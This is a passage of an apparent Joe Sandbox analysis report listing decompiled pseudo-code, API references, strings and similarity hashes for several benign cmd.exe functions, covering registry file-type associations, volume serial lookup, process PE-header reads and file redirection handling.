								_t67 = RegCreateKeyExW(_v540,  &_v528, 0, 0, 0, 0x2000000, 0,  &_v536,  &_v548);
								_v544 = _t67;
								if(_t67 != 0) {
									E001BC5A2(_t82, 0x400023a5, 1, _t75);
									_t52 = _v544;
								} else {
									_t69 = _v532;
									if(_t69 == 0) {
										goto L30;
									} else {
										 *_t98 = _t69;
										_t98 =  &(_t98[1]);
										RegCloseKey(_v536);
										continue;
									}
								}
								goto L42;
							}
						}
					}
				} else {
					_push(0);
					_push(0x400023db);
					E001BC5A2(__ecx);
					_t52 = 1;
				}
				L42:
				return E001C6FD0(_t52, _t75, _v8 ^ _t100, _t90, _t93, _t98);
			}

0x001d59f1
0x001d59f8
0x001d59fc
0x001d59fe
0x001d5a05
0x001d5a07
0x001d5a0e
0x001d5a11
0x001d5a16
0x001d5a16
0x001d5a19
0x001d5a1c
0x001d5a2d
0x001d5a56
0x001d5a5b
0x001d5a5d
0x001d5a66
0x001d5a6c
0x001d5a6f
0x001d5a72
0x00000000
0x00000000
0x00000000
0x001d5a72
0x001d5a7c
0x001d5a7e
0x001d5a82
0x001d5a8a
0x001d5a8d
0x001d5a8f
0x001d5acc
0x001d5acc
0x001d5a91
0x001d5a96
0x001d5a9b
0x001d5a9d
0x001d5aa8
0x001d5aae
0x00000000
0x001d5ab0
0x001d5ab4
0x001d5ab5
0x001d5ab8
0x001d5abb
0x001d5ac1
0x001d5ac4
0x00000000
0x001d5ac6
0x00000000
0x001d5ac6
0x001d5ac4
0x00000000
0x001d5aae
0x001d5aca
0x00000000
0x00000000
0x001d5aca
0x001d5acf
0x001d5acf
0x001d5ad1
0x001d5ad1
0x001d5af5
0x001d5af9
0x001d5bdd
0x001d5bdf
0x001d5c55
0x001d5c59
0x001d5c63
0x00000000
0x001d5c63
0x001d5be7
0x001d5be7
0x001d5be9
0x001d5bec
0x001d5bec
0x001d5bef
0x001d5bf2
0x001d5bf9
0x001d5c19
0x001d5c1d
0x001d5c2d
0x001d5c2f
0x001d5c30
0x001d5c3d
0x001d5c1f
0x001d5c1f
0x001d5c20
0x001d5c26
0x001d5c68
0x001d5c68
0x001d5c1d
0x001d5c71
0x00000000
0x001d5aff
0x001d5b01
0x001d5bd0
0x001d5c77
0x001d5c77
0x001d5b11
0x001d5b11
0x001d5b17
0x001d5b17
0x001d5b1a
0x001d5b1c
0x001d5b25
0x00000000
0x00000000
0x001d5b27
0x001d5b29
0x001d5b29
0x001d5b2c
0x001d5b36
0x00000000
0x00000000
0x001d5b38
0x001d5b3c
0x001d5b3f
0x001d5b41
0x001d5b43
0x001d5b4c
0x00000000
0x00000000
0x00000000
0x001d5b4c
0x001d5b4e
0x001d5b50
0x001d5b7b
0x001d5b81
0x001d5b89
0x001d5bb5
0x001d5bba
0x001d5b8b
0x001d5b8b
0x001d5b94
0x00000000
0x001d5b96
0x001d5b9c
0x001d5b9f
0x001d5ba2
0x00000000
0x001d5ba2
0x001d5b94
0x00000000
0x001d5b89
0x001d5b17
0x001d5b01
0x001d5a2f
0x001d5a2f
0x001d5a31
0x001d5a36
0x001d5a3e
0x001d5a3e
0x001d5c79
0x001d5c89

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 001D5AEF
RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 001D5B7B
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001D5BA2
RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,001B24AC,00000000,00000002,?,00000000), ref: 001D5C13
RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 001D5C4F
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001D5C71

Strings

\Shell\Open\Command, xrefs: 001D5A91
%s=%s, xrefs: 001D5C21

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CloseValue$CreateDeleteOpen
String ID: %s=%s$\Shell\Open\Command
API String ID: 4081037667-3301834661
Opcode ID: 0cb245c1b030ba20d11c579598c8122f839fe76970cf7b904aa76eeda0e2c2f6
Instruction ID: 98981101c9d43136d13caa149e115319d30402c9ed4e7090fae7ab0d1ab18c0c
Opcode Fuzzy Hash: 0cb245c1b030ba20d11c579598c8122f839fe76970cf7b904aa76eeda0e2c2f6
Instruction Fuzzy Hash: DD71DC75A407299BDB345B18CC85BF973BAEF54700F1501ABF909A7390EB719E80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001D6B30 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E001D6B30(void* __ebx, signed short* _a4) {
				signed int _v8;
				char _v268;
				intOrPtr _v272;
				short _v276;
				short _v790;
				signed short _v802;
				long _v804;
				void* __edi;
				void* __esi;
				signed int _t20;
				short _t22;
				intOrPtr _t23;
				signed short _t24;
				void* _t29;
				signed short _t33;
				signed short _t34;
				long _t52;
				signed short* _t54;
				void* _t56;
				signed short* _t57;
				long _t60;
				void* _t66;
				long _t68;
				DWORD* _t70;
				signed short* _t71;
				void* _t72;
				signed short* _t74;
				void* _t75;
				signed int _t76;
				signed int _t78;
				signed int _t80;
				void* _t81;

				_t56 = __ebx;
				_t80 = (_t78 & 0xfffffff8) - 0x320;
				_t20 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t20 ^ _t80;
				_t22 =  *L" :\\"; // 0x3a0020
				_t74 = _a4;
				_t70 = 0;
				_v276 = _t22;
				_t23 =  *0x1b3a8c; // 0x5c
				_t68 =  *_t74 & 0x0000ffff;
				_v272 = _t23;
				_v804 = 0;
				if(_t68 != 0) {
					_t57 = _t74;
					_t71 =  &(_t57[1]);
					do {
						_t24 =  *_t57;
						_t57 =  &(_t57[1]);
					} while (_t24 != _v804);
					if(_t57 - _t71 >> 1 != 2 || _t74[1] != 0x3a || iswalpha(_t68) == 0) {
						E001C25D9(L"\r\n");
						_pop(_t60);
						_push(0);
						_push(0xf);
						goto L19;
					} else {
						_t33 = towupper( *_t74 & 0x0000ffff);
						_t70 = 0;
						goto L10;
					}
				} else {
					_t54 =  *0x1f3cb8;
					if(_t54 == 0) {
						_t54 = 0x1f3ab0;
					}
					_t33 = towupper( *_t54 & 0x0000ffff);
					L10:
					_pop(_t66);
					_t34 = _t33 & 0x0000ffff;
					_t76 = _t34 & 0x0000ffff;
					_v276 = _t34;
					if(GetVolumeInformationW( &_v276,  &_v790, 0x101,  &_v804, _t70, _t70, _t70, _t70) != 0) {
						_push(_t76);
						_push(L"%c");
						_push(0x104);
						_push(0x1f3d00);
						if(_v790 == 0) {
							E001C274C();
							E001BC108(_t66, 0x235e, 1, 0x1f3d00);
							_t81 = _t80 + 0x1c;
						} else {
							E001C274C();
							_push( &_v790);
							E001BC108(_t66, 0x235f, 2, 0x1f3d00);
							_t81 = _t80 + 0x20;
						}
						_push(_v804 & 0x0000ffff);
						E001C274C( &_v268, 0x80, L"%04X-%04X", _v802 & 0x0000ffff);
						E001BC108(_t66, 0x235b, 1,  &_v268);
						_t80 = _t81 + 0x20;
						_t29 = 0;
					} else {
						E001C25D9(L"\r\n");
						_t52 = GetLastError();
						_t60 = 0x15;
						if(_t52 != _t60) {
							_t60 = GetLastError();
						}
						_push(_t70);
						_push(_t60);
						L19:
						E001BC5A2(_t60);
						_t29 = 1;
					}
				}
				_pop(_t72);
				_pop(_t75);
				return E001C6FD0(_t29, _t56, _v8 ^ _t80, _t68, _t72, _t75);
			}

0x001d6b30
0x001d6b38
0x001d6b3e
0x001d6b45
0x001d6b4c
0x001d6b52
0x001d6b56
0x001d6b58
0x001d6b5f
0x001d6b64
0x001d6b67
0x001d6b6e
0x001d6b75
0x001d6b91
0x001d6b93
0x001d6b96
0x001d6b96
0x001d6b99
0x001d6b9c
0x001d6baa
0x001d6cc4
0x001d6cc9
0x001d6ccc
0x001d6ccd
0x00000000
0x001d6bcb
0x001d6bcf
0x001d6bd5
0x00000000
0x001d6bd5
0x001d6b77
0x001d6b77
0x001d6b7e
0x001d6b80
0x001d6b80
0x001d6b89
0x001d6bd7
0x001d6bd7
0x001d6bda
0x001d6bde
0x001d6be1
0x001d6c09
0x001d6c3a
0x001d6c3b
0x001d6c45
0x001d6c4a
0x001d6c4b
0x001d6c69
0x001d6c76
0x001d6c7b
0x001d6c4d
0x001d6c4d
0x001d6c56
0x001d6c5f
0x001d6c64
0x001d6c64
0x001d6c83
0x001d6c9c
0x001d6cb3
0x001d6cb8
0x001d6cbb
0x001d6c0b
0x001d6c10
0x001d6c16
0x001d6c1e
0x001d6c21
0x001d6c29
0x001d6c29
0x001d6c2b
0x001d6c2c
0x001d6ccf
0x001d6ccf
0x001d6cd7
0x001d6cd8
0x001d6c09
0x001d6ce0
0x001d6ce1
0x001d6cec

APIs

towupper.MSVCRT ref: 001D6B89
iswalpha.MSVCRT ref: 001D6BBC
towupper.MSVCRT ref: 001D6BCF
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 001D6C01
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001D6C16
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001D6C23

Strings

:\, xrefs: 001D6B4C
%04X-%04X, xrefs: 001D6C8A

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ErrorLasttowupper$InformationVolumeiswalpha
String ID: :\$%04X-%04X
API String ID: 4001382275-3541097225
Opcode ID: 9d33207f8dd63bddf37764ed4cd27044a0dbc2b4ffe87ae2615464b1f3e2b48b
Instruction ID: b745fa76bea8134b64d5d1f9f5c63ff5a26ac9e94a95063b953afb3a9f189bfc
Opcode Fuzzy Hash: 9d33207f8dd63bddf37764ed4cd27044a0dbc2b4ffe87ae2615464b1f3e2b48b
Instruction Fuzzy Hash: 7041D872614310ABD724AB659C46FBB77ECDBA8B10F00441FF999D66C0EB70DA40D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 001D587B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 122
registryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E001D587B(void* __ebx, void* __ecx, short* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _t23;
				char _t38;
				short* _t44;
				char* _t48;
				char* _t51;
				char* _t55;
				char* _t56;
				char* _t57;
				void* _t58;

				_t45 = __ecx;
				_push(0x18);
				_push(0x1dc0e0);
				E001C7678(__ebx, __edi, __esi);
				_t44 = __edx;
				 *(_t58 - 0x20) = __ecx;
				_t23 =  *(_t58 + 8);
				if(_t23 == 0 ||  *_t23 == 0) {
					__imp__RegDeleteKeyExW(_t45, _t44, 0, 0);
					_t55 = _t23;
					 *(_t58 - 0x1c) = _t55;
					if(_t55 == 0) {
						goto L16;
					}
					_t56 = RegOpenKeyExW( *(_t58 - 0x20), _t44, 0, 0x2000000, _t58 - 0x24);
					 *(_t58 - 0x1c) = _t56;
					if(_t56 == 0) {
						_t55 = RegDeleteValueW( *(_t58 - 0x24), 0x1b24ac);
						 *(_t58 - 0x1c) = _t55;
						if(_t55 != 0) {
							_push(0);
							E001BC5A2(_t45);
							_t45 = _t55;
						}
						RegCloseKey( *(_t58 - 0x24));
					} else {
						if(_t56 != 2) {
							_push(0);
							E001BC5A2(_t45);
							_t45 = _t56;
						}
					}
					goto L15;
				} else {
					_t55 = RegCreateKeyExW(__ecx, __edx, 0, 0, 0, 2, 0, _t58 - 0x20, 0);
					 *(_t58 - 0x1c) = _t55;
					if(_t55 != 0) {
						L7:
						_push(0);
						_push(_t55);
						E001BC5A2(_t45);
						E001BC5A2(_t45, 0x235d, 1, _t44);
						goto L15;
					} else {
						_t51 =  *(_t58 + 8);
						_t48 = _t51;
						_t57 =  &(_t48[2]);
						do {
							_t38 =  *_t48;
							_t48 =  &(_t48[2]);
						} while (_t38 != 0);
						_t45 = _t48 - _t57 >> 1;
						_t55 = RegSetValueExW( *(_t58 - 0x20), 0, 0, 1, _t51, 2 + (_t48 - _t57 >> 1) * 2);
						 *(_t58 - 0x1c) = _t55;
						RegCloseKey( *(_t58 - 0x20));
						if(_t55 != 0) {
							goto L7;
						}
						_push( *(_t58 + 8));
						_push(_t44);
						E001C25D9(L"%s=%s\r\n");
						L15:
						if(_t55 != 0) {
							L19:
							return E001C76BD(_t55);
						}
						L16:
						 *((intOrPtr*)(_t58 - 4)) = 0;
						if(E001C7797(_t45) != 0) {
							 *0x1fc020(0x8000000, 0, 0, 0);
						}
						 *((intOrPtr*)(_t58 - 4)) = 0xfffffffe;
						goto L19;
					}
				}
			}

0x001d587b
0x001d587b
0x001d587d
0x001d5882
0x001d5887
0x001d5889
0x001d588c
0x001d5893
0x001d5930
0x001d5936
0x001d5938
0x001d593d
0x00000000
0x00000000
0x001d5953
0x001d5955
0x001d595a
0x001d597a
0x001d597c
0x001d5981
0x001d5983
0x001d5985
0x001d598b
0x001d598b
0x001d598f
0x001d595c
0x001d595f
0x001d5961
0x001d5963
0x001d5969
0x001d5969
0x001d595f
0x00000000
0x001d58a2
0x001d58b5
0x001d58b7
0x001d58bc
0x001d5913
0x001d5913
0x001d5914
0x001d5915
0x001d5922
0x00000000
0x001d58be
0x001d58be
0x001d58c1
0x001d58c3
0x001d58c6
0x001d58c6
0x001d58c9
0x001d58cc
0x001d58d3
0x001d58eb
0x001d58ed
0x001d58f3
0x001d58fb
0x00000000
0x00000000
0x001d58fd
0x001d5900
0x001d5906
0x001d5995
0x001d5997
0x001d59dc
0x001d59e3
0x001d59e3
0x001d5999
0x001d5999
0x001d59a3
0x001d59ad
0x001d59ad
0x001d59b3
0x00000000
0x001d59b3
0x001d58bc

APIs

RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001DC0E0,00000018,001D4B14,00000000,00000003), ref: 001D58AF
RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001DC0E0), ref: 001D58E5
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001DC0E0,00000018,001D4B14,00000000,00000003), ref: 001D58F3
RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,001DC0E0,00000018,001D4B14,00000000,00000003), ref: 001D5930
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,001DC0E0,00000018,001D4B14,00000000,00000003), ref: 001D594D
RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,001B24AC,?,00000000,02000000,?,?,?,00000000,00000000,001DC0E0,00000018,001D4B14,00000000,00000003), ref: 001D5974
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,001DC0E0,00000018,001D4B14,00000000,00000003), ref: 001D598F

Strings

%s=%s, xrefs: 001D5901

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CloseDeleteValue$CreateOpen
String ID: %s=%s
API String ID: 1019019434-1087296587
Opcode ID: a9246c44cdb540f2b6566db2860b163e70cfefa6796ca871485f6c7fd2e02458
Instruction ID: 7ababc21093eda55849fe53540d74a1388f8cdbadb585204d76c8ce961ddec4c
Opcode Fuzzy Hash: a9246c44cdb540f2b6566db2860b163e70cfefa6796ca871485f6c7fd2e02458
Instruction Fuzzy Hash: 6631B371D00A29FBDB34AB558C09FAF7A79EFD9B64B05411AF80566250D7314D01CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 001D53E0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 114
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E001D53E0(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v968;
				intOrPtr _v1004;
				intOrPtr _v1140;
				void _v1148;
				void _v1152;
				void _v1156;
				void _v1160;
				long _v1164;
				void* _v1184;
				char _v1188;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				void* _t42;
				struct HINSTANCE__* _t47;
				void* _t62;
				void* _t63;
				signed int _t64;

				_t60 = __edx;
				_t22 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t22 ^ _t64;
				_t62 = __ecx;
				_v1152 = 0;
				if( *0x1f8104 != 0) {
					L4:
					_t63 =  *0x1f8100;
					L5:
					if(_t63 != 0) {
						 *0x1f94b4(_t62, 0,  &_v1188, 0x18, 0);
						if( *_t63() >= 0) {
							_t63 = _v1184;
							if(ReadProcessMemory(_t62, _t63,  &_v1148, 0x470,  &_v1164) != 0) {
								if(_v1164 < 0xb4 || _v1004 - _t63 <= 0xb4) {
									if(ReadProcessMemory(_t62, _v1140 + 0x3c,  &_v1160, 4, 0) != 0 && ReadProcessMemory(_t62, _v1140 + _v1160 + 4,  &_v1156, 2, 0) != 0) {
										_t60 = _v1160 + _v1140 + 0x18;
										_t42 = E001D573B(_v1156, _v1160 + _v1140 + 0x18);
										if(_t42 != 0) {
											ReadProcessMemory(_t62, _t42,  &_v1152, 2, 0);
										}
									}
								} else {
									_v1152 = _v968;
								}
							}
						}
					}
					return E001C6FD0(_v1152, 0, _v8 ^ _t64, _t60, _t62, _t63);
				}
				_t47 = LoadLibraryExW(L"NTDLL.DLL", 0, 0);
				 *0x1f8104 = _t47;
				if(_t47 == 0) {
					 *0x1f8104 =  *0x1f8104 | 0xffffffff;
					goto L4;
				} else {
					_t63 = GetProcAddress(_t47, "NtQueryInformationProcess");
					 *0x1f8100 = _t63;
					goto L5;
				}
			}

0x001d53e0
0x001d53eb
0x001d53f2
0x001d53fc
0x001d53fe
0x001d540b
0x001d5440
0x001d5440
0x001d5446
0x001d5448
0x001d545c
0x001d5466
0x001d546c
0x001d548f
0x001d54a0
0x001d54db
0x001d551a
0x001d551c
0x001d5523
0x001d5531
0x001d5531
0x001d5523
0x001d54ae
0x001d54b5
0x001d54b5
0x001d54a0
0x001d548f
0x001d5466
0x001d554e
0x001d554e
0x001d5414
0x001d541a
0x001d5421
0x001d5439
0x00000000
0x001d5423
0x001d542f
0x001d5431
0x00000000
0x001d5431

APIs

LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 001D5414
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 001D5429
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000470,?), ref: 001D5487
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 001D54D3
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 001D54FA
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 001D5531

Strings

NTDLL.DLL, xrefs: 001D540F
NtQueryInformationProcess, xrefs: 001D5423

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: MemoryProcessRead$AddressLibraryLoadProc
String ID: NTDLL.DLL$NtQueryInformationProcess
API String ID: 1580871199-2613899276
Opcode ID: 351b505dcfe04adf17b87959b3b4319cc2e1a4a0dbc5c081fd0c51cd8a30460c
Instruction ID: 06391b67b70cf535efae003cee58b1cea3ed994c987a3c3e1fa7f42686326a76
Opcode Fuzzy Hash: 351b505dcfe04adf17b87959b3b4319cc2e1a4a0dbc5c081fd0c51cd8a30460c
Instruction Fuzzy Hash: 9A41A2B1A04119AFEB209B24DC84FBE77BDEB44714F0041A9BA09E3741DB309E82CF65

Uniqueness

Uniqueness Score: -1.00%

Function 001B5DB5 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E001B5DB5(void* __ecx, signed int __edx) {
				long _v8;
				WCHAR* _v12;
				struct _SECURITY_ATTRIBUTES _v24;
				void* __ebx;
				signed int _t15;
				long _t17;
				void* _t19;
				long _t22;
				long _t23;
				WCHAR* _t32;
				signed int _t38;
				void* _t39;
				void* _t40;
				signed int _t42;

				_v24.lpSecurityDescriptor = _v24.lpSecurityDescriptor & 0x00000000;
				_t39 = __ecx;
				_v24.nLength = 0xc;
				_t23 = 3;
				_t41 = __edx;
				_t38 = __edx & _t23;
				_v24.bInheritHandle = 1;
				if(_t38 > 2) {
					L2:
					_t42 = _t41 | 0xffffffff;
					L3:
					return _t42;
				}
				_t15 = __edx & 0x00000009;
				if(_t15 != 9) {
					_push(L"con");
					_push(__ecx);
					if(_t38 != 0) {
						_t41 = (__edx | 1) << 0x1e;
						__imp___wcsicmp();
						if(_t15 != 0) {
							_t23 = 1;
						}
						_v8 = 2;
					} else {
						_t41 = 0x80000000;
						_v8 = 3;
						__imp___wcsicmp();
						if(_t15 == 0) {
							_t23 = 1;
						}
					}
					_t32 = E001C22C0(_t23, _t39);
					_t17 = _v8;
					_v12 = _t32;
					if(_t17 == 2) {
						_t19 = CreateFileW(_t32, _t41, _t23,  &_v24, 3, 0x8000080, 0);
						_t40 = _t19;
						if(_t40 != 0xffffffff) {
							goto L8;
						}
						_t17 = _v8;
						_t32 = _v12;
						goto L7;
					} else {
						L7:
						_t19 = CreateFileW(_t32, _t41, _t23,  &_v24, _t17, 0x8000080, 0);
						_t40 = _t19;
						if(_t40 == 0xffffffff) {
							_t22 = GetLastError();
							 *0x1f3cf0 = _t22;
							if(_t22 == 0x6e) {
								 *0x1f3cf0 = 2;
							}
							goto L2;
						}
						L8:
						__imp___open_osfhandle(_t40, 8);
						_t42 = _t19;
						if(_t42 == 0xffffffff) {
							CloseHandle(_t40);
						}
						goto L3;
					}
				}
				goto L2;
			}

0x001b5dbd
0x001b5dc6
0x001b5dc8
0x001b5dcf
0x001b5dd2
0x001b5dd5
0x001b5dd7
0x001b5ddd
0x001b5de8
0x001b5de8
0x001b5dec
0x001b5df3
0x001b5df3
0x001b5de1
0x001b5de6
0x001b5df6
0x001b5dfb
0x001b5dfe
0x001c9ce0
0x001c9ce3
0x001c9ced
0x001c9cf1
0x001c9cf1
0x001c9cf2
0x001b5e04
0x001b5e04
0x001b5e09
0x001b5e10
0x001b5e1a
0x001b5e6d
0x001b5e6d
0x001b5e1a
0x001b5e23
0x001b5e25
0x001b5e28
0x001b5e2e
0x001c9d0e
0x001c9d14
0x001c9d19
0x00000000
0x00000000
0x001c9d1f
0x001c9d22
0x00000000
0x001b5e34
0x001b5e34
0x001b5e43
0x001b5e49
0x001b5e4e
0x001c9d36
0x001c9d3c
0x001c9d44
0x001c9d4a
0x001c9d4a
0x00000000
0x001c9d44
0x001b5e54
0x001b5e57
0x001b5e5d
0x001b5e64
0x001c9d2b
0x001c9d2b
0x00000000
0x001b5e64
0x001b5e2e
0x00000000

APIs

_wcsicmp.MSVCRT ref: 001B5E10
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,08000080,00000003,08000080,00000000), ref: 001B5E43
_open_osfhandle.MSVCRT ref: 001B5E57
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 001C9D2B

Strings

con, xrefs: 001B5DF6

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
String ID: con
API String ID: 689241570-4257191772
Opcode ID: 4055723bf191a59f5e4addde4d257c197d9f03a502d3d0e052b6ec331a91c5a6
Instruction ID: c5053f5e89a5e63d9b423c96d43eb88b1e8d626fdc598e0668a0073dc1d85efa
Opcode Fuzzy Hash: 4055723bf191a59f5e4addde4d257c197d9f03a502d3d0e052b6ec331a91c5a6
Instruction Fuzzy Hash: F7310932A04514AFE724ABB99C8DBBEB6AAE755731F21031DF922E32C0DB708D01C650

Uniqueness

Uniqueness Score: -1.00%

Function 001D554F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E001D554F(WCHAR* __ecx, void* __edx) {
				signed int _v8;
				long _v16;
				char _v76;
				signed short _v80;
				char _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				signed int _t15;
				signed short _t23;
				signed short* _t31;
				signed int _t32;
				void* _t42;
				void* _t43;
				signed int _t44;

				_t41 = __edx;
				_t12 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t12 ^ _t44;
				_t42 = 0;
				_t32 = 0;
				if(__ecx != 0) {
					_t43 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
					if(_t43 == 0xffffffff) {
						L16:
						_t15 = _t32;
						goto L17;
					}
					_t41 =  &_v76;
					if(E001D5768(_t43,  &_v76, 0x40) != 0 && 0x5a4d == _v76 && SetFilePointer(_t43, _v16, 0, 0) != 0xffffffff) {
						_t41 =  &_v100;
						if(E001D5768(_t43,  &_v100, 4) != 0 && _v100 == 0x4550) {
							_t41 =  &_v96;
							if(E001D5768(_t43,  &_v96, 0x14) != 0) {
								_t23 = _v80;
								if(_t23 != 0) {
									_t42 = HeapAlloc(GetProcessHeap(), 8, _t23 & 0x0000ffff);
									if(_t42 != 0) {
										_t41 = _t42;
										if(E001D5768(_t43, _t42, _v80 & 0x0000ffff) != 0) {
											_t41 = _t42;
											_t31 = E001D573B(_v96, _t42);
											if(_t31 != 0) {
												_t32 =  *_t31 & 0x0000ffff;
											}
										}
										RtlFreeHeap(GetProcessHeap(), 0, _t42);
									}
								}
							}
						}
					}
					CloseHandle(_t43);
					goto L16;
				} else {
					_t15 = 0;
					L17:
					return E001C6FD0(_t15, _t32, _v8 ^ _t44, _t41, _t42, _t43);
				}
			}

0x001d554f
0x001d5557
0x001d555e
0x001d5564
0x001d5566
0x001d556a
0x001d558a
0x001d558f
0x001d564e
0x001d564e
0x00000000
0x001d564e
0x001d5597
0x001d55a3
0x001d55cb
0x001d55d7
0x001d55e4
0x001d55f0
0x001d55f2
0x001d55f9
0x001d560e
0x001d5612
0x001d5618
0x001d5624
0x001d5629
0x001d562b
0x001d5632
0x001d5634
0x001d5634
0x001d5632
0x001d5641
0x001d5641
0x001d5612
0x001d55f9
0x001d55f0
0x001d55d7
0x001d5648
0x00000000
0x001d556c
0x001d556c
0x001d5651
0x001d5661
0x001d5661

APIs

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 001D5584
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 001D55BE
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 001D5601
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001D5608
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 001D563A
RtlFreeHeap.NTDLL(00000000), ref: 001D5641
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 001D5648

Strings

PE, xrefs: 001D55D9

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

